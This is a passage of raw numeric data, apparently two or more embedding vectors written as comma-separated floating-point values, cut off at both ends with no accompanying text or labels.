.013178749,-0.03450386,0.0044293245,0.04551991,0.0012392818,-0.015551318,0.030406427,-0.0034491615,0.024834195,0.00260467,0.019724898,-0.016637996,-0.011116806,0.006510809,-0.005252321,-0.027408311,0.034172703,0.019189358,0.0089758895,-0.01545111,0.016094794,0.017395258,-0.015509791,0.010257877,-0.017656997,-0.0036454082,-0.0026038268,0.0078791175,-0.03179992,-0.013542782,0.014700531,-0.0027272785,0.00876502,-0.057231043,0.021844035,0.01568223,0.007058354,0.017969761,0.010554068,-0.0018022464,-0.029691385,0.00084609573,-0.0112251425,0.0015578589,-0.014816633,0.0043150587,0.014448358,0.023636522,-0.0015982654,0.0024274574,0.016267492,0.013551148,-0.013748748,-0.0074324403,0.009712325,-0.003955988,0.0019131931,0.0037008454,-0.035578813,0.027874436,0.010703149,-0.010140849,-0.000036552352,-0.01302824,-0.019600227,-0.00910903,-0.042740364,0.030842934,-0.011624492,-0.02825605,-0.008887122,0.009804562,-0.0007098814,-0.0069045043,-0.0030115503,-0.024546659,0.0023476097,-0.009643749,-0.0035818839,-0.010111893,-0.005741527,-0.0033011804,-0.0012310033,-0.036234632,0.0022048037,-0.0009173315,-0.0015638035,-0.022308959,-0.020907672,-0.015386197,0.018521428,0.036503356,0.010097957,0.012432958,-0.0035385604,-0.002081386,0.0029034948,-0.004027429,0.017944276,-0.016556062,-0.028799996,0.0038795625,0.023562023,-0.006502478,-0.015156665,0.014920616,0.013136086,0.0014721598,0.0055255047,0.0013307292,-0.018484479,-0.014233306,0.016036179,-0.004342573,-0.013991445,0.00632108,-0.016029106,-0.009973351,0.018271478,-0.0060350327,-0.033038802,0.0021096414,-0.014393945,-0.01366945,-0.013081644,-0.012931795,-0.013955465,0.026096394,0.0036276882,-0.018728651,0.0036102484,0.025504377,-0.026322532,-0.00027657967,-0.003855812,-0.020063685,0.0053715864,-0.023380853,-0.0019677612,0.013547862,0.0013303342,0.011119225,-0.011105083,0.034720916,0.03294919,0.008164087,-0.002963262,0.008601454,-0.010804803,-0.01029332,-0.0028368237,-0.011656131,0.0007936892,-0.039642528,0.008151159,-0.026312383,-0.02622916,0.008048258,0.05371146,-0.055506743,0.0028808508,0.0017655957,0.0015108165,-0.038695917,0.016103074,0.007191274,-0.024286222,-0.012873131,0.023440337,-0.008574822,-0.019872515,-0.015594147,0.009199778,-0.008562702,-0.0022254582,-0.0099607045,0.006620572,-0.007121872,-0.0068012024,0.0032902153,-0.0021136783,0.00036089876,-0.00066032045,-0.0061485744,-0.013736133,-0.02757573,0.021936726,0.025204906,0.0012202098,0.0036861547,0.021021621,-0.03070619,-0.0057640565,0.023733305,-0.0073190406,0.028500406,0.0032611117,-0.046970963,-0.007880381,-0.0033283401,-0.007882933,-0.0047657103,0.0016550184,-0.003746042,-0.025900587,-0.0020770298,-0.0116859935,0.082309,-0.017972194,-0.013964007,0.0068098744,-0.0066398834,0.005733924,0.019778343,0.010771535,0.013927563,0.012154543,0.0063713053,-0.007665734,0.0012603096,0.031516634,-0.018106831,0.006396787,0.018255183,0.102986336,-0.018500103,0.020322705,0.010018241,-0.0018178526,-0.0058072875,0.0058837077,0.0051724003,-0.10296136,0.000083962004,-0.034642853,-0.0120811,-0.018253764,-0.028168153,0.028725266,0.0056297374,0.016386487,-0.0076913373,0.00083542307,0.010478144,0.001915712,-0.047230747,-0.02112333,0.0257158,-0.005837601,-0.005064755,-0.011565469,-0.026888631,0.020433761,-0.026463158,-0.007854212,0.0060402174,0.01682779,0.0152821615,0.0048417365,0.02659751,0.013138203,0.0126081705,0.009094001,0.011860087,0.0128414165,-0.03524259,0.013883251,0.000008823737,0.012526531,-0.012559193,0.02570513,-0.008705042,-0.01315393,-0.0011532542,-0.0042361272,0.0018990512,0.024254866,0.033953853,0.016282868,-0.010583299,-0.01869598,0.048955254,0.00294378,-0.0071863034,-0.0065004556,0.012090938,-0.0039133006,0.03036736,0.012579611,-0.010815173,-0.009452425,0.0048112785,0.017381223,0.006887818,0.028542647,0.03610836,-0.012049823,-0.003907378,-0.0011544046,-0.004881185,0.025265504,0.017531753,0.018836495,-0.0041732765,-0.00964006,0.017947355,-0.020936904,-0.0044452134,0.032370534,-0.0033821848,-0.013527868,-0.0008632699,0.0071046264,-0.008120322,-0.021304892,0.0036844288,0.009611231,0.0171424,0.024699258,-0.024577018,0.004527908,-0.025972925,-0.008371391,-0.0007741826,-0.0043036663,-0.039087605,-0.012444196,0.011966887,-0.005762085,0.0033120667,0.023355609,-0.021643773,-0.0007168187,0.009385972,0.0038838366,-0.022668896,0.008802281,-0.013263413,0.0015439002,0.014608545,0.05717608,-0.0029478201,-0.014930723,0.01020602,-0.028251495,-0.040003568,-0.037067596,0.029522946,-0.0019434369,0.012783757,0.0030978452,-0.017270066,-0.011007156,0.015948901,-0.0017099765],[-0.014647728,-0.012644406,-0.034262512,-0.020552415,-0.0008166555,-0.012030094,0.01784992,-0.003361606,0.005673068,-0.015234591,-0.004259047,0.025713261,0.0015247858,0.003497222,-0.03423649,-0.018146995,0.0090835765,0.0038716116,0.017288134,-0.0046186214,0.00036749037,-0.0015476826,0.026166882,0.0020989038,0.009491984,0.004924094,-0.0069092494,-0.0033210837,-0.004016804,-0.0036408557,-0.009296622,0.033842396,0.02393167,-0.004038153,0.014154096,0.019156465,-0.030102195,-0.026325023,0.02730618,-0.0074639474,-0.0018794457,0.028482629,-0.03151007,0.020006163,-0.0033927895,0.0036668924,-0.021465052,0.019438341,-0.0038410414,0.001023629,0.0024558979,-0.0013646795,-0.054509535,0.01123751,-0.00819892,-0.0054385886,0.0005318173,-0.010536573,0.0169588,-0.0031715552,-0.00058854575,0.017130826,-0.014349276,-0.013487772,0.02707983,0.014113732,-0.0028535991,-0.01327763,-0.006353359,-0.019759018,-0.008317679,0.0076785516,-0.0025676843,0.006988932,0.0027387883,0.011402111,-0.001589612,0.004234731,-0.037561294,0.015271438,-0.019194137,-0.003732903,0.0024026781,-0.012633611,0.024082975,0.0014968897,-0.0046527022,-0.0017956847,-0.0117828455,-0.024800805,-0.018622104,0.009572873,0.012513904,0.019606965,0.009350314,0.003925904,0.010757383,-0.026653565,0.007873635,0.027982725,0.00042446045,0.000051695828,-0.024150455,0.020498814,0.013485336,-0.0256871,-0.022661485,-0.016664738,0.00865736,-0.008097936,0.007269836,0.025846832,0.006631855,0.014912482,-0.006354197,-0.020632328,-0.0062149684,0.010823904,-0.000355512,0.032657936,-0.0035018313,0.017430536,-0.015457324,-0.002264817,-0.010718461,-0.030761726,-0.007439516,0.015149772,-0.00809532,-0.008085301,-0.0048644016,0.013066758,0.009579977,-0.015655478,0.012022233,-0.006009065,0.0108732125,0.0041353996,0.012159975,-0.0025596651,0.013844181,-0.012711276,0.0037071146,0.00833034,0.016409583,0.016472802,-0.008634661,0.027127158,0.00853762,-0.008815071,0.021969248,-0.010739487,-0.013304398,-0.019747412,-0.007435761,0.023494737,0.007066909,-0.010906676,-0.01274996,-0.010553105,0.0047103716,-0.0069801863,0.012551205,-0.014195719,-0.005952184,-0.0225044,0.003975282,-0.0102778515,-0.03341332,0.016387023,0.028943026,0.041692495,-0.0058105476,-0.011272302,0.013540033,0.010186586,0.0076114084,-0.024456594,0.005545015,-0.020095164,0.009566849,-0.006439904,-0.017134061,-0.026768487,-0.011948581,0.04720313,-0.0037930994,-0.021632595,-0.009040945,-0.024529979,0.023396226,-0.036940373,0.005354533,0.005121103,-0.022585431,-0.030015724,-0.0055230544,0.07061543,-0.0051627937,-0.0031406125,-0.021570938,0.0067129913,0.0008664188,-0.023207843,0.0040242923,-0.0053105745,0.00896082,-0.008342239,0.013048898,-0.0021529002,0.022644227,-0.017868906,-0.00060235435,0.0052377046,0.029147122,-0.05992548,0.016491171,0.012773227,0.006558623,-0.0016285126,-0.024717541,-0.0008903808,0.004853664,-0.047114346,-0.026434906,-0.018913558,-0.013515003,0.0089799855,0.006840421,-0.0037884433,0.033315763,0.005729338,-0.015785605,-0.013150551,0.02936548,-0.005467496,0.0014827277,-0.0028196564,0.009900557,0.008816632,-0.008853788,0.006386683,0.027082743,0.01642973,-0.012826844,-0.005379912,0.013299653,0.00019922917,-0.02268253,0.009021504,-0.006783321,-0.0068564834,-0.001666018,0.02278152,0.0015987025,-0.013652542,-0.015535227,-0.017124983,-0.014688306,-0.002669717,0.037949126,0.028112238,0.0016762186,0.019461917,0.020254757,0.009875723,0.008798093,-0.046624936,-0.004684487,-0.017330592,-0.029639663,-0.014307114,-0.010236031,0.0077513824,-0.009118176,-0.0020415876,0.015345475,0.0073719174,0.014039822,-0.023448955,-0.009825624,0.0056632287,0.0015411384,-0.03299924,-0.02218803,0.013675828,0.00169986,0.019885322,0.012925773,-0.005472579,-0.012313742,0.018699879,0.008924259,0.015221089,-0.029733773,0.0025641248,-0.025355086,0.011242976,0.016724639,-0.0085052075,0.009550822,0.023854878,0.021981856,0.001701093,-0.005734724,0.004074788,-0.023183512,0.013743234,-0.009868497,0.023286512,-0.039795917,0.0051382314,-0.01989069,-0.0013624979,0.0064575803,0.026000198,-0.012164783,-0.013362196,-0.010567683,-0.01850396,0.012128521,-0.00858649,0.013464246,-0.013857935,-0.013361509,0.003458099,0.0039087697,-0.009639244,0.021608397,0.019072572,0.01313352,0.014807744,0.0058875903,0.014144791,-0.046532974,0.0055722296,-0.003846447,0.0019703198,0.020527009,-0.006080481,-0.036095805,-0.013673687,-0.012333054,0.017178595,-0.0011162162,-0.020828165,-0.004219975,-0.0072779963,-0.0015006934,-0.0036688065,0.022016035,0.009792244,-0.0084706675,0.011841295,-0.011962142,-0.0023869677,0.0015009812,-0.0020098295,-0.008802886,-0.03589707,0.020224197,-0.0118193235,-0.018812055,0.011371533,0.06988531,0.007627779,0.006552154,-0.0025583275,-0.025248948,-0.011331158,0.008589913,0.009795059,-0.008073298,0.030803392,-0.010918708,-0.0022474884,0.012977447,0.017722897,-0.032785244,0.015372957,-0.013389507,-0.015913254,-0.032405026,-0.0007045525,0.022945236,-0.004505408,0.012790023,0.014077172,0.013551462,0.024959885,0.0032864646,-0.012819726,0.00031523698,-0.024111625,0.0098009845,0.0037036312,0.005930049,0.009571606,-0.034163013,0.021759681,0.022491755,-0.011267051,-0.03524252,-0.0075678844,-0.00039035932,0.0016296026,0.00485399,-0.021640863,0.0019753866,0.046798486,0.0017822408,0.014422878,-0.014580118,0.030110564,0.02568864,0.032899845,-0.020606762,0.016508197,-0.010933585,0.028185204,0.026783537,-0.031857196,0.057546385,0.026533015,-0.011232983,0.011673974,0.0012166376,-0.022126831,-0.0008142711,0.009667169,0.00066248927,-0.023635108,-0.01475777,0.004549196,0.00010740234,0.0005302498,-0.026752288,0.024446066,0.010013692,0.013556342,0.014252036,-0.011561106,-0.0019765352,0.029727183,-0.02119332,0.015820537,0.0053412328,-0.010644497,-0.00022117292,0.0064611766,-0.012335278,0.012123072,0.02473209,0.0048842262,0.009693532,0.00231722,0.009090403,-0.0020356837,0.020925872,0.004309851,0.0072133746,0.027522273,0.0052567874,0.0060755555,-0.00510322,0.0011669893,-0.015708538,-0.0032619294,-0.011653539,-0.0069275303,-0.005192377,-0.0076668505,0.0061940295,0.042852562,-0.00091167184,-0.0118653085,0.010261121,-0.04192884,-0.016826632,-0.04758491,0.000786954,0.010646696,-0.017493496,0.0007841174,0.024684804,0.0014204684,0.01421606,0.005239644,0.007063951,0.00045207934,0.011565707,-0.01798091,-0.0073282598,0.01888819,0.0018751569,0.038680386,0.03288089,-0.024559062,0.023480516,0.018211056,-0.01412268,-0.012722746,0.029463831,0.009653368,0.014558876,0.029824732,0.018315,0.007214676,0.015157546,0.023619063,0.02066368,-0.010536339,-0.023695476,-0.0026018198,0.0070264135,0.0010017961,0.001511145,-0.009389326,0.0042954613,0.0036811617,0.03408648,-0.011523328,-0.0057486426,-0.015197926,0.025114078,-0.042739395,-0.006980176,0.014059852,-0.020911045,0.03185745,-0.003283404,0.06886989,-0.025973571,-0.047004864,0.0064202803,0.013006926,0.028311897,-0.009454807,0.018949114,-0.02059402,-0.0033784208,0.0027721864,0.032430176,0.007861231,0.018399943,-0.01567401,-0.0047861715,-0.018278744,0.0036979697,-0.021730227,-0.0009478489,-0.02014239,0.0081152,0.0046144333,-0.013809062,-0.0059293346,0.013853992,0.031859133,-0.019127902,-0.010722695,-0.012663265,-0.016987747,0.0071216444,0.026300823,-0.004655719,0.011414358,0.011216568,-0.0008226166,-0.00593005,-0.044285227,0.03466924,-0.0066136587,-0.0038190212,0.010223625,0.025871698,0.034562,-0.005939906,0.015049974,0.011177768,0.035136294,-0.0019957225,0.014053065,0.011407353,0.01740109,-0.011845053,-0.016479546,0.008094317,0.0060128095,0.0119294375,-0.020730555,-0.009627883,-0.012353814,-0.008105844,-0.0148135135,-0.013516834,-0.01977172,0.020151122,0.0011967304,-0.0003221997,-0.006095165,-0.04105712,-0.0004116178,0.028194845,0.0007439678,-0.016161498,0.015673783,0.006569907,-0.009639642,0.042501606,-0.008739281,0.002584339,0.013831391,0.024130093,0.004757958,0.0029974899,0.0048276507,-0.010789841,0.00024420404,0.013450188,0.009742531,-0.005633423,-0.0034850992,-0.025897006,0.01285442,0.012570871,0.016649049,0.009210027,0.0053913924,-0.014541116,0.0031482582,-0.001799703,-0.018278457,0.015104526,-0.020372016,0.038642425,-0.018247297,-0.0112128295,0.0073768413,-0.024345653,-0.0013489163,-0.0032755362,0.017563693,-0.029251141,-0.0031539851,0.009788925,0.022766463,-0.015661957,0.026039556,0.0076816645,-0.0052351053,0.018553054,-0.015855748,-0.025889613,0.0056312373,-0.0030992087,0.003373884,-0.01356035,-0.009934552,-0.0478482,0.00015995765,-0.008889001,-0.046504322,-0.0369589,0.04447626,0.017147709,0.008818732,-0.0126353325,-0.0011943326,-0.0097119305,-0.0006932098,0.006679491,-0.049442016,-0.00092738686,0.008148618,-0.009847726,0.031735532,0.039546993,-0.00653151,-0.0054954393,-0.04000917,0.00879934,0.00022619005,0.028840255,-0.028093977,-0.01025181,0.031064173,-0.015817344,0.02498748,-0.010563553,0.03128386,0.031702172,0.024513515,-0.0031778808,0.012778294,0.007770294,0.012067449,-0.034931533,0.010572614,-0.0054581515,0.02184817,0.0035257768,0.0078009767,0.005323169,0.005560362,0.0016310684,-0.0074014426,-0.012058156,0.023033826,0.032934256,0.025218967,0.032259032,0.0019234398,0.017277049,-0.008306627,0.006480232,-0.015851617,0.028482873,0.015195774,-0.004508251,0.029963331,-0.0029884556,0.026845021,-0.025929857,-0.00941981,-0.014875219,0.03195539,0.038801506,0.0118657835,0.007746612,-0.0048350254,0.00020908748,0.00047572792,-0.027813938,-0.0007754285,-0.0041080997,-0.016935067,0.004883436,-0.028679663,-0.015156744,-0.05497121,0.0033181163,0.009058486,0.025162293,-0.01851697,0.0054416847,-0.0016709287,0.005655378,-0.017382534,-0.041610483,-0.02034632,-0.0057642446,0.019413177,-0.023155034,-0.0017652253,0.0059200344,0.01591712,-0.0045908405,0.030777177,-0.014382091,-0.023041084,0.018796394,-0.011422865,0.015567732,0.005693483,0.0226598,-0.0060728565,0.006366838,-0.018378846,-0.009148493,-0.0043434366,0.0029705393,0.0036037585,0.0071446076,0.009900768,-0.0015621576,0.003206088,-0.026715297,-0.003110241,0.002704355,-0.04699163,-0.0332486,0.0012628029,0.01454498,0.0032661431,0.018488372,-0.02828355,0.024297979,0.007855193,-0.015369957,0.006186366,-0.010072706,-0.007952735,0.03234781,0.029297998,0.0023284745,-0.043475356,-0.02715199,0.022147791,-0.0010456129,0.02331508,-0.018098881,-0.0124411,-0.0286033,-0.03382907,0.005319284,-0.0062098093,-0.007333743,0.0111899,-0.031558353,0.038509898,-0.021313803,-0.004421727,0.01283121,0.015480831,0.023874644,-0.010897184,0.020186676,-0.009234239,-0.021796167,0.013007672,0.0016229673,0.009591811,0.0050888974,-0.030980362,0.0073415856,-0.0261056,0.0051698475,-0.017266339,0.0147040505,-0.006043279,-0.014112882,-0.0021801274,0.017931065,0.004012558,0.01650132,-0.018698992,-0.008587047,-0.0028568152,0.005227218,-0.011732994,0.0039925794,-0.036741715,0.040186066,-0.023061022,-0.018282952,0.017554581,0.017737437,0.010797117,-0.00577228,0.010307613,0.0048259757,-0.015766628,0.038824763,0.01203645,0.014743113,0.013508788,0.007444246,0.0032784939,-0.010761228,-0.0065287435,-0.025220037,-0.00584765,0.002359656,-0.027930986,-0.0019467166,-0.015227271,-0.015507736,0.009674059,-0.0021995252,0.034412332,0.008503522,0.008253851,0.029837921,0.013203272,-0.015510019,-0.0012891416,0.0042663724,-0.006575629,-0.0039619496,-0.0029953322,-0.007701835,0.009119884,0.03781287,0.012851865,0.009819734,-0.0012882176,-0.0038494067,-0.01024021,-0.0107003385,0.00076165935,-0.0038240605,-0.016007371,0.029265165,-0.01571894,0.005496001,-0.01939288,-0.0025785195,0.009502794,-0.039002847,-0.013091528,0.013891396,0.006204833,0.026871026,-0.011145135,-0.0052659465,-0.0040932293,0.016777454,-0.031972963,0.015135815,0.022572609,0.012791316,0.009992986,0.004266634,0.0010622768,-0.029721083,0.026551263,-0.013018503,-0.0012983984,0.0038021314,-0.00440587,-0.006713946,0.005162668,-0.029035365,0.01394853,0.022282416,-0.022411438,0.0067589465,-0.018895388,-0.03581629,-0.0015413673,-0.010770829,-0.019354908,-0.004705437,-0.0012959744,0.01803982,0.0077960975,-0.0033781412,-0.0042364886,-0.047498837,0.02388071,-0.018583879,-0.023702193,-0.0059996345,0.0031009428,0.015893629,0.012297008,0.028530492,-0.0085835615,0.014590196,-0.0001643275,0.021843888,0.003383235,0.0005843618,-0.011406955,-0.01864463,0.0119338175,0.008541626,0.009105502,0.014832877,-0.024469046,-0.00013669368,-0.009407336,0.023129037,0.00084525644,-0.016462421,0.009484926,-0.030907815,0.014957229,0.0071309777,0.043505743,0.0046934197,-0.00787762,-0.025278721,-0.017491551,-0.0026927537,0.02095921,-0.02010669,0.014738542,-0.0058767362,-0.023265483,-0.009503033,0.011909467,-0.026657615,-0.0056327265,-0.004102592,-0.025946151,0.005738274,-0.0077987057,0.01990121,0.006103309,-0.0037344906,0.0063728406,-0.0022934126,0.025660222,-0.010386772,0.011932654,0.017321069,0.001944617,-0.008393382,0.0039294,0.03486364,0.018573187,-0.015613871,-0.025347069,-0.005769616,0.032629423,-0.009165407,-0.01355724,-0.025414279,-0.013499989,-0.0030710564,-0.0076700943,-0.010754036,0.0097169345,-0.007483595,-0.01859735,-0.0070764897,-0.01994891,-0.004686473,0.018114647,-0.019200686,-0.019852294,-0.024997858,-0.025941294,-0.006943034,0.012454301,-0.001037096,-0.021919183,-0.0008298518,0.009588482,0.0067913174,-0.0074329446,-0.00893269,0.0023810426,-0.0025076664,0.01254234,-0.00035041964,0.0064720577,0.035159424,-0.02828286,0.0010111675,0.04789726,-0.00011560864,0.00055184244,0.013010445,0.023361957,0.0019302415,0.015858864,-0.0053755874,0.0052772146,-0.008091,0.01965544,0.013766079,-0.005405928,-0.0067617507,0.027955156,0.015778476,0.011979264,0.011309192,-0.018577505,0.029808328,0.013775221,0.017242718,0.013256402,0.018841855,0.0034959551,-0.0042802882,0.0023102108,-0.0028390917,0.006969016,0.022332048,-0.005525481,0.010197366,0.023363737,0.022860529,-0.043670002,-0.009224846,-0.011819982,-0.007153943,0.010421616,-0.030163312,0.02634878,0.0073748026,-0.021010233,0.009661485,0.002971395,-0.0075085755,0.015283359,-0.01779583,-0.00094152207,0.000862733,-0.0069811335,-0.016084189,-0.0046790964,0.0031784216,-0.008289121,-0.011053265,0.019274464,-0.0037989959,-0.015276051,-0.015185546,0.0073619606,-0.022966705,0.02285705,-0.027784307,-0.0012914639,-0.013035294,-0.025941141,-0.015191695,0.0012152165,0.011135592,0.035195727,-0.00019343231,-0.013478322,0.029950885,0.010434563,0.01267907,0.014137763,-0.011466973,0.014834113,0.020898575,-0.0251681,-0.006612971,0.009936451,-0.0041757463,-0.0135813495,-0.009434875,-0.023004439,-0.015313558,-0.030854166,0.0029228288,-0.007730307,-0.017959664,0.05111672,-0.011083616,0.021789093,0.016704557,-0.0066707022,-0.020098858,0.025336592,0.023080409,0.04046045,-0.0011722419,0.028057745,0.00044635986,-0.032571334,0.0043964973,0.030644165,-0.0097437715,0.013054707,0.012484123,-0.012202472,0.0026697395,-0.009044061,-0.011644045,0.011920669,0.022278594,-0.042759407,0.008981451,0.034280058,-0.008715556,0.027295904,-0.0039750794,-0.010397158,0.04320691,0.012418603,0.002065669,0.01307921,0.016913483,0.0075258138,0.0042007538,0.03394933,-0.023780162,0.006171237,-0.004808238,0.019281752,-0.028581655,-0.029225966,0.013292021,0.012582935,0.01134443,-0.00682405,0.0033431633,0.031033918,-0.0016070971,-0.0009260916,0.0033999092,0.013226694,0.0010374675,0.0135123115,0.00018355956,-0.010150548,0.0005768243,-0.0033073463,-0.027226632,-0.031557567,0.009214694,-0.006504569,-0.0068383287,0.00737623,-0.01547923,0.01210461,-0.0067533483,0.00023026422,-0.0019349053,0.016412266,0.035024717,-0.0124087995,0.011457403,0.00128635,-0.0016977862,0.0054659112,0.008963518,0.0069543766,-0.0041790106,-0.014117574,0.0325511,-0.0054538944,0.010795406,-0.0012399044,0.020001711,-0.0497311,0.01599805,0.015623159,0.008195098,-0.01292178,0.015132578,0.008401639,-0.009534488,-0.016361795,0.014558716,0.002758913,0.006133628,-0.015748277,0.0011630513,-0.016278382,0.0114290835,-0.019908689,0.052956104,-0.0065909466,-0.00047492664,-0.020094821,-0.005852021,-0.018284103,0.005810339,0.0039497884,0.0008878017,0.0014766671,-0.018876228,-0.022940174,-0.0025825344,-0.009419592,0.013483648,-0.000032901164,0.0007249238,-0.024335949,-0.011968746,0.015941376,0.004665879,0.0012484287,0.0075169713,-0.021931496,0.00035171377,0.016883241,0.0044081714,0.007953543,0.011624475,-0.009123854,0.014517237,-0.033088602,0.0199178,0.013925093,0.0022231073,0.01296333,0.0025874902,-0.008375445,0.0017248339,0.014512032,0.009599459,-0.009603255,0.017421212,0.014971244,0.017517809,-0.0014543791,-0.0008614623,-0.022964714,0.00073212176,-0.0121211335,-0.0005899778,0.005037237,-0.022558017,0.005892875,-0.007322161,-0.01324451,0.016119711,-0.010814461,0.0131736975,-0.006856472,0.02023113,0.017453535,0.0032638316,-0.019411707,-0.019328278,-0.011146284,0.008498844,-0.015415276,0.014993847,-0.02752572,0.01714562,-0.025370864,0.009708724,0.0020789122,-0.006543917,0.001822146,0.01269544,-0.011186126,-0.014643374,-0.02603138,0.0023933868,-0.0011771393,0.02535456,-0.0045070285,-0.00069083757,0.003557687,0.010042264,-0.003658501,0.061785813,0.009728845,0.016420027,-0.0053089475,0.006736676,0.03393872,0.004158188,0.022603335,0.013584602,0.006041401,-0.014157866,0.029241906,0.0020591426,0.016111774,0.026886288,-0.032497182,0.02834657,-0.011396543,-0.0101272715,-0.0009901221,0.0012754237,0.0145304,0.015261861,0.015028279,0.0058087576,0.011862484,0.007953327,0.0008143507,0.022871612,-0.001458327,-0.014228721,0.009094474,0.022014702,0.014521692,-0.004453404,-0.03110199,0.0007732759,0.06951227,-0.00048161356,-0.018382045,0.018219972,-0.005338338,0.014457966,-0.08391857,0.0034779077,0.020611232,-0.009929037,0.009034461,-0.008664985,-0.01227542,0.0037875231,-0.0032261517,-0.022562068,-0.025216708,-0.018311393,0.014506828,-0.016620705,-0.006461528,0.0041535627,0.0006274594,0.013344773,-0.035914768,-0.00040892346,0.008568695,0.003960922,-0.0046776533,-0.014451584,0.0073022726,-0.010621615,0.019254867,0.0031123778,-0.026200656,0.019957446,0.0038324813,-0.014978723,-0.0064182295,-0.010373032,0.00021765893,0.028869305,-0.027423415,-0.020991243,-0.11550471,0.01043763,0.013653092,-0.030611947,0.011857554,-0.019801242,-0.017183507,-0.002198045,0.031869765,-0.01941066,-0.018207258,0.018421164,0.003810949,0.0070901676,-0.01427258,0.0066288444,-0.006655843,0.012825365,0.0067535606,-0.0019493566,0.007462109,-0.006381353,-0.005290393,-0.04386142,-0.02556898,0.0036142292,0.009395898,0.033203263,0.0006623128,-0.0025434194,-0.011100827,-0.011269677,-0.019351179,0.008192333,-0.01648083,-0.038195208,0.0028806373,0.012860973,-0.012531734,0.033725675,-0.0055434383,-0.004371116,0.0036009944,0.0018101268,0.007109835,0.01690561,0.004099475,0.008901933,0.018531216,0.026119826,0.011029035,0.009587651,-0.014756347,0.016972985,-0.008242459,0.0131157655,-0.0067763673,-0.02826918,-0.011631893,-0.0060148416,-0.006251575,-0.041833047,-0.0054471185,-0.012762176,0.033321794,-0.01739634,0.009274033,-0.03881491,-0.008334344,-0.0036045515,-0.0062829796,0.0068565467,-0.005870118,-0.008063267,0.03073037,-0.0043325434,-0.008892842,-0.02475361,0.020211702,-0.009156985,0.00019385364,0.010779544,-0.0110501675,-0.037926476,0.008462522,-0.0025043113,-0.019936886,0.016976364,-0.0072735087,-0.013510734,0.027417915,-0.018216692,0.009624586,-0.011876447,0.01480518,-0.00057322753,0.04948598,0.0014630025,-0.007202582,0.010996594,0.0026873364,-0.012328366,-0.003723496,-0.008170758,0.00018387844,0.016359134,-0.015212979,-0.02867849,-0.011599474,-0.0014730685,0.0004111432,-0.02092146,0.02141134,-0.013098689,-0.03138864,-0.024987344,-0.009496457,-0.012567157,0.0014400306,-0.0013446524,-0.011437109,0.0051930645,-0.0037184933,0.025330236,0.044324715,0.03782789,-0.023250757,-0.026106061,-0.001240456,0.029638998,-0.042713508,0.00792434,-0.009052656,-0.009863969,-0.017535403,0.00833266,-0.014382282,-0.004666636,-0.034063537,-0.003310426,0.009328099,0.012460732,-0.018491706,-0.0029302835,0.0047410885,-0.01755706,0.05653905,-0.016718773,0.022527646,-0.005466938,0.011194061,0.018447744,-0.012477465,-0.022979105,0.01931361,0.045366123,-0.0011355543,-0.013447669,-0.0024504627,-0.010051056,0.007628971,0.029010868,-0.024629215,-0.015985755,-0.014558449,-0.008686211,0.0015842948,-0.0029774192,-0.0070279418,-0.010922749,0.007713877,0.008908471,-0.0032135537,-0.00045730823,0.00998734,0.020189507,-0.0075022406,-0.011881605,0.0149030965,0.011089227,0.01004587,0.032765828,0.007851797,-0.0018460394,-0.0004529002,-0.01706561,-0.014158032,-0.00015451964,0.006458257,-0.0064437822,-0.034452744,-0.024579965,0.019199857,0.008979112,-0.003007917,0.00065420545,0.038412023,0.002807328,-0.017331008,0.008508671,-0.022615679,-0.018022312,-0.013236931,0.007408525,0.0073069725,0.0033881722,-0.00056061015,0.0006717198,-0.0039236597,-0.009613677,0.016052501,-0.0062243845,0.00072876876,-0.011112862,-0.004422181,0.032861926,-0.006093652,-0.031187743,-0.0044517843,-0.003642425,-0.011093798,0.0010888685,0.0073959525,-0.008155055,0.013512268,-0.01402644,-0.009891157,-0.045730855,-0.006742215,-0.0006943986,0.005843542,-0.019401224,-0.0042105396,-0.012272669,0.018883917,0.0011294336,0.045813393,0.005798879,-0.0066552134,-0.02809011,-0.033754423,-0.01913636,0.03041652,-0.01513206,0.005407754,0.0059720073,0.0072661703,0.008007138,0.00505277,0.009302957,-0.000057579542,0.030982686,0.009593764,0.011062093,-0.0031551453,0.012974951,0.012510672,0.012918556,-0.00091510074,-0.005646797,-0.0054644663,-0.014095688,0.012168789,0.015041854,-0.02370903,-0.0041921064,-0.027926188,0.01779914,-0.035752166,0.0057819844,0.042716462,-0.006473515,0.021922298,0.009289268,-0.0009064957,-0.012585901,0.0267267,-0.013838169,-0.015583404,0.030221635,-0.035398066,0.019475954,0.002811119,-0.011552343,0.04124667,0.0012101055,0.02260573,0.007638473,0.00032982897,-0.011662437,-0.012438556,0.00012367267,0.0057540457,0.0049511343,0.036722615,-0.026947264,-0.012435268,-0.0035129364,-0.004045025,-0.0041443002,-0.0014909168,0.0024764703,-0.02865803,-0.024366912,-0.010613254,-0.02660285,0.019012034,0.004955874,0.020992229,0.021480707,-0.0034245246,0.0019681617,-0.022586184,0.0036916696,-0.00020103967,-0.0005597999,0.023097426,-0.0017064009,0.005748045,-0.01993708,0.020172667,0.056810867,-0.0000127696,0.02157459,0.0008748742,-0.0019183274,-0.017690886,0.0013298191,0.006428036,0.011297911,-0.00072011194,-0.008924221,0.01939358,-0.017220477,-0.02034654,0.008321261,-0.0025291163,0.006095524,-0.009508787,-0.0084257955,0.0134134125,-0.013087377,0.030508777,-0.015262875,-0.0011922489,-0.016099762,0.00023313709,-0.009761383,-0.011753698,-0.013797098,0.009725512,0.021936039,-0.004216437,0.023927996,0.004139865,0.0029987083,0.031172523,-0.026135199,-0.012457378,0.014473097,-0.008496768,0.0021559154,-0.018841725,0.010228105,0.0027419268,-0.010461695,0.0071512647,-0.0035503365,0.00712899,-0.031934187,-0.02037074,-0.0005928574,0.032691717,0.0032322882,-0.024820158,0.00800759,-0.009579942,0.015961815,-0.004249698,-0.0072773304,0.011322924,-0.046601318,0.04876583,-0.038587965,-0.0021248544,-0.017940857,0.020027582,0.018019244,-0.014919913,0.011475026,-0.007965542,-0.0040716464,-0.018466996,-0.03436373,0.023252139,-0.011877138,-0.008393912,-0.012949794,0.023562795,0.0041276,-0.036875155,-0.0028607335,0.010254109,0.004429674,0.026272161,0.0062598567,-0.0155242765,-0.049811855,-0.011281531,0.014272813,-0.032156233,0.020951709,0.025476782,-0.016457787,-0.020126592,0.0038939754,-0.034792487,-0.00075280445,-0.013289325,0.0015931358,0.018569116,0.0031069282,0.05327742,0.0063508605,-0.0050622425,0.010281308,-0.007389959,-0.02161735,0.0047865277,-0.009466902,-0.014664897,0.030772159,-0.008555115,0.013049137,0.027911207,0.008938086,-0.015467893,-0.009031846,0.0063483077,0.004204614,0.007087182,-0.011819689,0.007929561,-0.026337583,-0.035268147,-0.01472258,0.02036634,0.03285208,-0.00020446235,-0.017307524,-0.018084135,-0.0018815541,-0.015030383,0.